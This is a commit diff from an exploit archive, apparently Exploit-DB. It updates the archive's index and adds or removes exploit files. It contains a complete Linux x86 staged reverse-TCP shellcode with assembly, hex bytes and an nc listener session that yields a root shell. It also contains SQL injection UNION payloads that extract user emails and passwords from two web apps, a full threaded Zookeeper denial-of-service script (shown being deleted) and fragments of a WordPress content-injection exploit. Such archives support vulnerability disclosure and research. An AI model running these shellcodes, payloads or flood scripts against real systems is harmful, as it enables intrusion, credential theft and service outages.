DB: 2017-02-09

3 new exploits Zookeeper 3.5.2 - Denial of Service Linux/x86 - Reverse TCP Alphanumeric Staged Shellcode (103 bytes) YapBB 1.2 - (forumID) Blind SQL Injection YapBB 1.2 - 'forumID' Parameter Blind SQL Injection ClearBudget 0.6.1 - (Misspelled htaccess) Insecure DD ClearBudget 0.6.1 - Insecure Database Download phpYabs 0.1.2 - (Azione) Remote File Inclusion phpYabs 0.1.2 - 'Azione' Parameter Remote File Inclusion IF-CMS 2.0 - 'frame.php id' Blind SQL Injection IF-CMS 2.0 - 'id' Parameter Blind SQL Injection BusinessSpace 1.2 - 'id' SQL Injection A Better Member-Based ASP Photo Gallery - 'entry' SQL Injection BusinessSpace 1.2 - 'id' Parameter SQL Injection A Better Member-Based ASP Photo Gallery - 'entry' Parameter SQL Injection FlexCMS - (catId) SQL Injection FlexCMS 2.5 - 'catId' Parameter SQL Injection Thyme 1.3 - (export_to) Local File Inclusion Papoo CMS 3.x - (pfadhier) Local File Inclusion q-news 2.0 - Remote Command Execution Potato News 1.0.0 - (user) Local File Inclusion Thyme 1.3 - 'export_to' Parameter Local File Inclusion Papoo CMS 3.x - 'pfadhier' Parameter Local File Inclusion Q-News 2.0 - Remote Command Execution Potato News 1.0.0 - Local File Inclusion Mynews 0_10 - Authentication Bypass Mynews 0.10 - Authentication Bypass Muviko Video CMS - SQL Injection Multi Outlets POS 3.1 - 'id' Parameter SQL Injection
2017-02-09 05:01:17 +00:00 · 2017-02-09 05:01:17 +00:00 · d1a0e8f9fd
commit d1a0e8f9fd
parent 2ff74c7c1b
6 changed files with 257 additions and 115 deletions
--- a/files.csv
+++ b/files.csv
@ -5359,7 +5359,6 @@ id,file,description,date,author,platform,type,port
 41219,platforms/hardware/dos/41219.txt,"QNAP NVR/NAS - Buffer Overflow",2017-02-01,bashis,hardware,dos,0
 41222,platforms/windows/dos/41222.py,"Microsoft Windows 10 - SMBv3 Tree Connect (PoC)",2017-02-01,"laurent gaffie",windows,dos,0
 41232,platforms/android/dos/41232.txt,"Google Android - 'rkp_set_init_page_ro' RKP Memory Corruption",2017-02-02,"Google Security Research",android,dos,0
 41277,platforms/linux/dos/41277.py,"Zookeeper 3.5.2 - Denial of Service",2017-02-07,"Brandon Dennis",linux,dos,0
 41278,platforms/openbsd/dos/41278.txt,"OpenBSD HTTPd < 6.0 - Memory Exhaustion Denial of Service",2017-02-07,PierreKimSec,openbsd,dos,80
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
@ -15876,6 +15875,7 @@ id,file,description,date,author,platform,type,port
 41174,platforms/lin_x86-64/shellcode/41174.nasm,"Linux/x86_64 - execve /bin/sh Shellcode (22 bytes)",2017-01-26,"Robert L. Taylor",lin_x86-64,shellcode,0
 41183,platforms/linux/shellcode/41183.c,"Linux - Multi/Dual mode execve(_/bin/sh__ NULL_ 0) Shellcode (37 bytes)",2017-01-29,odzhancode,linux,shellcode,0
 41220,platforms/linux/shellcode/41220.c,"Linux - Multi/Dual mode Reverse Shell Shellcode (129 bytes)",2017-02-02,odzhancode,linux,shellcode,0
 41282,platforms/lin_x86/shellcode/41282.nasm,"Linux/x86 - Reverse TCP Alphanumeric Staged Shellcode (103 bytes)",2017-02-08,"Snir Levi",lin_x86,shellcode,0
 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
@ -20682,12 +20682,12 @@ id,file,description,date,author,platform,type,port
 7980,platforms/php/webapps/7980.pl,"PHPbbBook 1.3 - 'bbcode.php l' Local File Inclusion",2009-02-04,Osirys,php,webapps,0
 7981,platforms/asp/webapps/7981.txt,"Power System Of Article Management 3.0 - File Disclosure / Cross-Site Scripting",2009-02-04,Pouya_Server,asp,webapps,0
 7982,platforms/asp/webapps/7982.txt,"team 1.x - File Disclosure / Cross-Site Scripting",2009-02-04,Pouya_Server,asp,webapps,0
-7984,platforms/php/webapps/7984.pl,"YapBB 1.2 - (forumID) Blind SQL Injection",2009-02-04,darkjoker,php,webapps,0
+7984,platforms/php/webapps/7984.pl,"YapBB 1.2 - 'forumID' Parameter Blind SQL Injection",2009-02-04,darkjoker,php,webapps,0
 7987,platforms/php/webapps/7987.txt,"gr blog 1.1.4 - Arbitrary File Upload / Authentication Bypass",2009-02-04,JosS,php,webapps,0
 7991,platforms/asp/webapps/7991.txt,"GR Note 0.94 Beta - (Authentication Bypass) Remote Database Backup",2009-02-04,JosS,asp,webapps,0
 7992,platforms/php/webapps/7992.txt,"ClearBudget 0.6.1 - Insecure Cookie Handling / Local File Inclusion",2009-02-05,SirGod,php,webapps,0
 7993,platforms/php/webapps/7993.txt,"Kipper 2.01 - Cross-Site Scripting / Local File Inclusion / File Disclosure",2009-02-05,RoMaNcYxHaCkEr,php,webapps,0
-7996,platforms/php/webapps/7996.txt,"ClearBudget 0.6.1 - (Misspelled htaccess) Insecure DD",2009-02-05,Room-Hacker,php,webapps,0
+7996,platforms/php/webapps/7996.txt,"ClearBudget 0.6.1 - Insecure Database Download",2009-02-05,Room-Hacker,php,webapps,0
 7997,platforms/php/webapps/7997.htm,"txtBB 1.0 RC3 HTML/JS Injection - Add Admin Privileges Exploit",2009-02-05,cOndemned,php,webapps,0
 7998,platforms/php/webapps/7998.txt,"WikkiTikkiTavi 1.11 - Remote Arbitrary.PHP File Upload",2009-02-06,ByALBAYX,php,webapps,0
 7999,platforms/php/webapps/7999.pl,"Simple PHP News 1.0 - Remote Command Execution",2009-02-06,Osirys,php,webapps,0
@ -20696,29 +20696,29 @@ id,file,description,date,author,platform,type,port
 8002,platforms/php/webapps/8002.txt,"CafeEngine - 'catid' Parameter SQL Injection",2009-02-06,SuNHouSe2,php,webapps,0
 8003,platforms/php/webapps/8003.pl,"1024 CMS 1.4.4 - Remote Command Execution with Remote File Inclusion (c99)",2009-02-06,JosS,php,webapps,0
 8004,platforms/php/webapps/8004.txt,"SilverNews 2.04 - Authentication Bypass / Local File Inclusion / Remote Code Execution",2009-02-06,x0r,php,webapps,0
-8005,platforms/php/webapps/8005.txt,"phpYabs 0.1.2 - (Azione) Remote File Inclusion",2009-02-06,Arka69,php,webapps,0
+8005,platforms/php/webapps/8005.txt,"phpYabs 0.1.2 - 'Azione' Parameter Remote File Inclusion",2009-02-06,Arka69,php,webapps,0
 8006,platforms/php/webapps/8006.txt,"Traidnt UP 1.0 - Arbitrary File Upload",2009-02-09,fantastic,php,webapps,0
-8007,platforms/php/webapps/8007.php,"IF-CMS 2.0 - 'frame.php id' Blind SQL Injection",2009-02-09,darkjoker,php,webapps,0
+8007,platforms/php/webapps/8007.php,"IF-CMS 2.0 - 'id' Parameter Blind SQL Injection",2009-02-09,darkjoker,php,webapps,0
 8009,platforms/php/webapps/8009.pl,"w3bcms 3.5.0 - Multiple Vulnerabilities",2009-02-09,DNX,php,webapps,0
-8011,platforms/php/webapps/8011.txt,"BusinessSpace 1.2 - 'id' SQL Injection",2009-02-09,K-159,php,webapps,0
+8011,platforms/php/webapps/8011.txt,"BusinessSpace 1.2 - 'id' Parameter SQL Injection",2009-02-09,K-159,php,webapps,0
-8012,platforms/php/webapps/8012.txt,"A Better Member-Based ASP Photo Gallery - 'entry' SQL Injection",2009-02-09,BackDoor,php,webapps,0
+8012,platforms/php/webapps/8012.txt,"A Better Member-Based ASP Photo Gallery - 'entry' Parameter SQL Injection",2009-02-09,BackDoor,php,webapps,0
 8014,platforms/php/webapps/8014.pl,"PHP Director 0.21 - Remote Command Execution",2009-02-09,darkjoker,php,webapps,0
 8015,platforms/php/webapps/8015.pl,"Hedgehog-CMS 1.21 - Remote Command Execution",2009-02-09,darkjoker,php,webapps,0
 8016,platforms/php/webapps/8016.txt,"AdaptCMS Lite 1.4 - Cross-Site Scripting / Remote File Inclusion",2009-02-09,RoMaNcYxHaCkEr,php,webapps,0
 8017,platforms/php/webapps/8017.txt,"SnippetMaster Webpage Editor 2.2.2 - Remote File Inclusion / Cross-Site Scripting",2009-02-09,RoMaNcYxHaCkEr,php,webapps,0
-8018,platforms/php/webapps/8018.txt,"FlexCMS - (catId) SQL Injection",2009-02-09,MisterRichard,php,webapps,0
+8018,platforms/php/webapps/8018.txt,"FlexCMS 2.5 - 'catId' Parameter SQL Injection",2009-02-09,MisterRichard,php,webapps,0
 8019,platforms/php/webapps/8019.txt,"ZeroBoardXE 1.1.5 (09.01.22) - Cross-Site Scripting",2009-02-09,make0day,php,webapps,0
 8020,platforms/php/webapps/8020.txt,"Yet Another NOCC 0.1.0 - Local File Inclusion",2009-02-09,Kacper,php,webapps,0
 8025,platforms/php/webapps/8025.txt,"webframe 0.76 - Multiple File Inclusion",2009-02-09,ahmadbady,php,webapps,0
 8026,platforms/php/webapps/8026.txt,"WB News 2.1.1 - config[installdir] Remote File Inclusion",2009-02-09,ahmadbady,php,webapps,0
 8027,platforms/php/webapps/8027.txt,"Gaeste 1.6 - 'gastbuch.php' Remote File Disclosure",2009-02-09,bd0rk,php,webapps,0
 8028,platforms/php/webapps/8028.pl,"Hedgehog-CMS 1.21 - Local File Inclusion / Remote Command Execution",2009-02-09,Osirys,php,webapps,0
-8029,platforms/php/webapps/8029.txt,"Thyme 1.3 - (export_to) Local File Inclusion",2009-02-10,cheverok,php,webapps,0
+8029,platforms/php/webapps/8029.txt,"Thyme 1.3 - 'export_to' Parameter Local File Inclusion",2009-02-10,cheverok,php,webapps,0
-8030,platforms/php/webapps/8030.txt,"Papoo CMS 3.x - (pfadhier) Local File Inclusion",2009-02-10,SirGod,php,webapps,0
+8030,platforms/php/webapps/8030.txt,"Papoo CMS 3.x - 'pfadhier' Parameter Local File Inclusion",2009-02-10,SirGod,php,webapps,0
-8031,platforms/php/webapps/8031.pph,"q-news 2.0 - Remote Command Execution",2009-02-10,Fireshot,php,webapps,0
+8031,platforms/php/webapps/8031.pph,"Q-News 2.0 - Remote Command Execution",2009-02-10,Fireshot,php,webapps,0
-8032,platforms/php/webapps/8032.txt,"Potato News 1.0.0 - (user) Local File Inclusion",2009-02-10,x0r,php,webapps,0
+8032,platforms/php/webapps/8032.txt,"Potato News 1.0.0 - Local File Inclusion",2009-02-10,x0r,php,webapps,0
 8033,platforms/php/webapps/8033.txt,"AuthPhp 1.0 - Authentication Bypass",2009-02-10,x0r,php,webapps,0
-8034,platforms/php/webapps/8034.txt,"Mynews 0_10 - Authentication Bypass",2009-02-10,x0r,php,webapps,0
+8034,platforms/php/webapps/8034.txt,"Mynews 0.10 - Authentication Bypass",2009-02-10,x0r,php,webapps,0
 8035,platforms/php/webapps/8035.txt,"BlueBird Pre-Release - Authentication Bypass",2009-02-10,x0r,php,webapps,0
 8036,platforms/php/webapps/8036.pl,"Fluorine CMS 0.1 rc 1 - File Disclosure / SQL Injection / Command Execution",2009-02-10,Osirys,php,webapps,0
 8038,platforms/php/webapps/8038.py,"TYPO3 < 4.0.12/4.1.10/4.2.6 - (jumpUrl) Remote File Disclosure",2009-02-10,Lolek,php,webapps,0
@ -37201,3 +37201,5 @@ id,file,description,date,author,platform,type,port
 41270,platforms/php/webapps/41270.txt,"FTP Made Easy PRO 1.2 - Arbitrary File Download",2017-02-07,"Ihsan Sencan",php,webapps,0
 41271,platforms/php/webapps/41271.txt,"Easy File Uploader 1.2 - Arbitrary File Download",2017-02-07,"Ihsan Sencan",php,webapps,0
 41272,platforms/php/webapps/41272.txt,"Responsive Filemanger <= 9.11.0 - Arbitrary File Disclosure",2017-02-07,"Wiswat Aswamenakul",php,webapps,0
 41279,platforms/php/webapps/41279.txt,"Muviko Video CMS - SQL Injection",2017-02-08,"Ihsan Sencan",php,webapps,0
 41280,platforms/php/webapps/41280.txt,"Multi Outlets POS 3.1 - 'id' Parameter SQL Injection",2017-02-08,"Ihsan Sencan",php,webapps,0
--- a/platforms/lin_x86/shellcode/41282.nasm
+++ b/platforms/lin_x86/shellcode/41282.nasm
@ -0,0 +1,198 @@
 ########### Reverse TCP Staged Alphanumeric Shellcode Linux x86 Execve /bin/sh ########
 			########### Author: Snir Levi, Applitects #############
 					## 103 Bytes ##
 date: 9.2.17
 Automatic python shellcode handler (with stage preset send) will be ready soon:
 https://github.com/snir-levi/Reverse_TCP_Alphanumeric_Staged_Shellcode_Execve-bin-bash/
 IP - 	127.0.0.1
 PORT - 	4444						
 #### Stage Alphanumeric shellcode: #####
 Stage 1:
 dup2 stdin syscall:
 WXW[j?XV[WYPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXP
 W	push edi
 X	pop eax
 W	push edi
 [	pop ebx
 j?	push 0x3f
 X	pop eax
 V	push esi
 [	pop ebx
 W	push edi
 Y	pop ecx
 P	push eax
 X	pop eax
 P	push eax
 X	pop EAX
 Stage 2:
 dup2 stdout syscall:
 WXW[j?XV[WYAPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPX
 W	push edi
 X	pop eax
 W	push edi
 [	pop ebx
 j?      push 0x3f
 X       pop eax
 V       push esi
 [       pop ebx
 W       push edi
 Y       pop ecx
 A	inc ecx (ecx =1)
 P       push eax
 X       pop eax
 P       push eax
 Stage 3:
 dup2 stderr syscall:
 WXW[j?XV[WYAPXAPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXP
 W	push edi
 X	pop eax
 W	push edi
 [	pop ebx
 j?      push 0x3f
 X       pop eax
 V       push esi
 [       pop ebx
 W       push edi
 Y       pop ecx
 A*2     inc ecx (ecx = 2)
 P       push eax
 X       pop eax
 A       inc ecx
 Stage 3:
 execve /bin/sh:
 j0XHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHWYWZWh//shh/binT[
 j0		push 0x30
 X		pop eax
 H*32		dec eax //eax = 0x0b
 W		push edi
 Y		pop ecx
 W		push edi
 Z		pop edx
 W		push edi // null terminator
 h//sh		push 0x68732f2f //sh
 h/bin		push 0x6e69622f /bin
 T		push esp
 [		pop ebx
 Usage: Victim Executes the shellcode, and opens tcp connection 
 Stage:
 		After Connection is established, send the 4 stages ***separately***
 		nc -lvp 4444
 		connect to [127.0.0.1] from localhost [127.0.0.1] (port)
 		WXW[j?XV[WYPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXP
 		WXW[j?XV[WYAPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPX
 		WXW[j?XV[WYAPXAPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXP
 		j0XHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHWYWZWh//shh/binT[
 		whoami
 		root
 		id
 		uid=0(root) gid=0(root) groups=0(root)
 global _start
 _start:
        ; sock = socket(AF_INET, SOCK_STREAM, 0)
        ; AF_INET = 2
        ; SOCK_STREAM = 1
        ; syscall number 102 - socketcall
 	; socket = 0x01
 	xor eax,eax
 	xor esi,esi
 	push eax
 	pop edi
 	push eax
 	mov al, 0x66
 	push byte 0x1
 	pop ebx
 	push byte ebx
 	push byte 0x2
 	mov ecx, esp
 	int 0x80
 	xchg esi, eax;  save sock result
 	; server.sin_family = AF_INET
        ; server.sin_port = htons(PORT)
        ; server.sin_addr.s_addr = inet_addr("127.0.0.1")
 	push byte 0x1
 	pop edx
 	shl edx, 24
 	mov dl, 0x7f	;edx = 127.0.0.1 (hex)
 	push edx
 	push word 0x5c11 ;port 4444
 	push word 0x02
        ; connect(sock, (struct sockaddr *)&server, sockaddr_len)
 	mov al, 0x66
 	mov bl, 0x3
 	mov ecx, esp
 	push byte 0x10
 	push ecx
 	push esi
 	mov ecx ,esp
 	int 0x80
 stageAddress:		;saves stage address to edx
        mov edx, [esp]
 	sub bl,3
 	jnz stage
 call near stageAddress 
 	;recv(int sockfd, void *buf, size_t len, int flags);
 stage:
 	mov al, 0x66
 	mov bl, 10
 	push edi
 	push word 100   ; buffer size
 	push edi
 	push esi	; socketfd
 	mov [esp+4],esp ; sets esp as recv buffer
 	mov ecx,esp
 	int 0x80
        mov al, 0xcd
        mov ah, 0x80 ; eax = int 0x80
        mov bl, 0xFF
        mov bh, 0xE2 ; ebx = jmp edx
        mov [esp+57],al
        mov [esp+58],ah
        mov [esp+59], ebx ;the end of the buffer contains the syscall command int 0x80 and jmp back to stage
 	jmp esp
 unsigned char[] = "\x31\xc0\x31\xf6\x50\x5f\x50\xb0\x66\x6a\x01\x5b\x53\x6a
 \x02\x89\xe1\xcd\x80\x96\x6a\x01\x5a\xc1\xe2\x18\xb2\x7f\x52
 \x66\x68\x11\x5c\x66\x6a\x02\xb0\x66\xb3\x03\x89\xe1\x6a\x10\x51\x56\x89\xe1
 \xcd\x80\x8b\x14\x24\x80\xeb\x03\x75\x05\xe8\xf3\xff\xff\xff
 \xb0\x66\xb3\x0a\x57\x66\x6a\x64\x57\x56\x89\x64\x24\x04\x89\xe1\xcd\x80\xb0
 \xcd\xb4\x80\xb3\xff\xb7\xe2\x88\x44\x24\x39\x88\x64\x24\x3a
 \x89\x5c\x24\x3b\xff\xe4"
--- a/platforms/linux/dos/41277.py
+++ b/platforms/linux/dos/41277.py
@ -1,86 +0,0 @@
 #!/usr/bin/python
 # Exploit Title: Zookeeper Client Denial Of Service (Port 2181)
 # Date: 2/7/2017
 # Exploit Author: Brandon Dennis
 # Email: bdennis@mail.hodges.edu
 # Software Link: http://zookeeper.apache.org/releases.html#download
 # Zookeeper Version: 3.5.2
 # Tested on: Windows 2008 R2, Windows 2012 R2 x64 & x86
 # Description: The wchp command to the ZK port 2181 will gather open internal files by each session/watcher and organize them for the requesting client. 
 #	This command is CPU intensive and will cause a denial of service to the port as well as spike the CPU of the remote machine to 90-100% consistently before any other traffic. 
 #	The average amount of threads uses was 10000 for testing. This should work on all 3.x+ versions of Zookeeper.
 #	This should effect Linux x86 & x64 as well
 import time
 import os
 import threading
 import sys
 import socket
 numOfThreads = 1
 exitStr = "n"
 stop_threads = False
 threads = []
 ipAddress = "192.168.1.5" #Change this
 port = 2181
 def sendCommand(ipAddress, port):
 	try:
 		s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 		s.connect((ipAddress, port))
 		s.send("wchp\r".encode("utf-8"))
 		s.recv(1024)
 		s.send("wchc\r".encode("utf-8"))
 		s.close()
 	except:
 		pass
 def runCMD(id, stop, ipAddress, port):
 	while True:
 		sendCommand(ipAddress, port)
 		if stop():
 			break
 	return
 def welcomeBanner():
 	banner = """ _______   __  _____               _               
 |___  | | / / /  __ \             | |              
   / /| |/ /  | /  \/_ __ __ _ ___| |__   ___ _ __ 
  / / |    \  | |   | '__/ _` / __| '_ \ / _ | '__|
 ./ /__| |\  \ | \__/| | | (_| \__ | | | |  __| |   
 \_____\_| \_/  \____|_|  \__,_|___|_| |_|\___|_|   
                 By: Brandon Dennis 
 		 Email: bdennis@mail.hodges.edu
 				 """
 	print(banner)
 welcomeBanner()
 numOfThreads = int(input("How many threads do you want to use: "))
 print ("Startin Up Threads...")	
 for i in range(numOfThreads):
 	t = threading.Thread(target=runCMD, args=(id, lambda: stop_threads, ipAddress, port))
 	threads.append(t)
 	t.start()
 print("Threads are now started...")
 while exitStr != "y":
 	inpt = input("Do you wish to stop threads(y): ")
 	if inpt == "y":
 		exitStr = "y"
 print("\nStopping Threads...")
 stop_threads = True		
 for thread in threads:
 	thread.join()
 print("Threads are now stopped...")
 sys.exit(0);
--- a/platforms/linux/webapps/41223.py
+++ b/platforms/linux/webapps/41223.py
@ -1,14 +1,3 @@
 # Exploit Title: Wordpress 4.7.0/4.7.1 Unauthenticated Content Injection PoC
 # Date: 2017-02-02
 # Exploit Author: @leonjza
 # Vendor Homepage: https://wordpress.org/
 # Software Link: https://wordpress.org/wordpress-4.7.zip
 # Version: Wordpress 4.7.0/4.7.1
 # Tested on: Debian Jessie
 #
 # PoC gist: https://gist.github.com/leonjza/2244eb15510a0687ed93160c623762ab
 #
 # 2017 - @leonjza
 #
 # Wordpress 4.7.0/4.7.1 Unauthenticated Content Injection PoC
@ -61,7 +50,7 @@ def get_posts(api_base):
    posts = json.loads(respone.read())
    for post in posts:
-        print(' - Post ID: {}, Title: {}, Url: {}'
+        print(' - Post ID: {0}, Title: {1}, Url: {2}'
              .format(post['id'], post['title']['rendered'], post['link']))
@ -76,11 +65,11 @@ def update_post(api_base, post_id, post_content):
    req = urllib2.Request(url, data, {'Content-Type': 'application/json'})
    response = urllib2.urlopen(req).read()
-    print('* Post updated. Check it out at {}'.format(json.loads(response)['link']))
+    print('* Post updated. Check it out at {0}'.format(json.loads(response)['link']))
 def print_usage():
-    print('Usage: {} <url> (optional: <post_id> <file with post_content>)'.format(__file__))
+    print('Usage: {0} <url> (optional: <post_id> <file with post_content>)'.format(__file__))
 if __name__ == '__main__':
@ -98,7 +87,7 @@ if __name__ == '__main__':
    print('* Discovering API Endpoint')
    api_url = get_api_url(sys.argv[1])
-    print('* API lives at: {}'.format(api_url))
+    print('* API lives at: {0}'.format(api_url))
    # if we only have a url, show the posts we have have
    if len(sys.argv) < 3:
@ -108,7 +97,7 @@ if __name__ == '__main__':
        sys.exit(0)
    # if we get here, we have what we need to update a post!
-    print('* Updating post {}'.format(sys.argv[2]))
+    print('* Updating post {0}'.format(sys.argv[2]))
    with open(sys.argv[3], 'r') as content:
        new_content = content.readlines()
--- a/platforms/php/webapps/41279.txt
+++ b/platforms/php/webapps/41279.txt
@ -0,0 +1,21 @@
 # # # # # 
 # Exploit Title: Muviko Video CMS Script - SQL Injection
 # Google Dork: N/A
 # Date: 08.02.2017
 # Vendor Homepage: https://muvikoscript.com/
 # Software Buy: https://codecanyon.net/item/muviko-movie-video-cms/19402086
 # Demo: https://demo.muvikoscript.com/
 # Version: N/A
 # Tested on: Win7 x64, Kali Linux x64
 # # # # # 
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Mail : ihsan[@]ihsan[.]net
 # # # # #
 # SQL Injection/Exploit :
 # http://localhost/[PATH]/search.php?q=[SQL]
 # -9999'+/*!50000union*/+select+1,concat_ws(0x3c62723e,email,0x3c62723e,password,0x3c62723e,name),3,4,5,6,7,8,9,10,11,12,13,14,15+from+users-- -
 # http://localhost/[PATH]/category.php?id=[SQL]
 # -9999'+/*!50000union*/+select+1,concat_ws(0x3c62723e,email,0x3c62723e,password,0x3c62723e,name),3,4,5,6,7,8,9,10,11,12,13,14,15+from+users-- -
 # Etc...
 # # # # #
--- a/platforms/php/webapps/41280.txt
+++ b/platforms/php/webapps/41280.txt
@ -0,0 +1,18 @@
 # # # # # 
 # Exploit Title: Point of Sales - Multi Outlets POS v3.1 Script - SQL Injection
 # Google Dork: N/A
 # Date: 08.02.2017
 # Vendor Homepage: http://prosoft-apps.com/
 # Software Buy: https://codecanyon.net/item/point-of-sales-multi-outlets-pos/17674742
 # Demo: http://pos.prosoft-apps.com/pos/
 # Version: N/A
 # Tested on: Win7 x64, Kali Linux x64
 # # # # # 
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Mail : ihsan[@]ihsan[.]net
 # # # # #
 # SQL Injection/Exploit :
 # http://localhost/[PATH]/view_invoice?id=[SQL]
 # Etc...
 # # # # #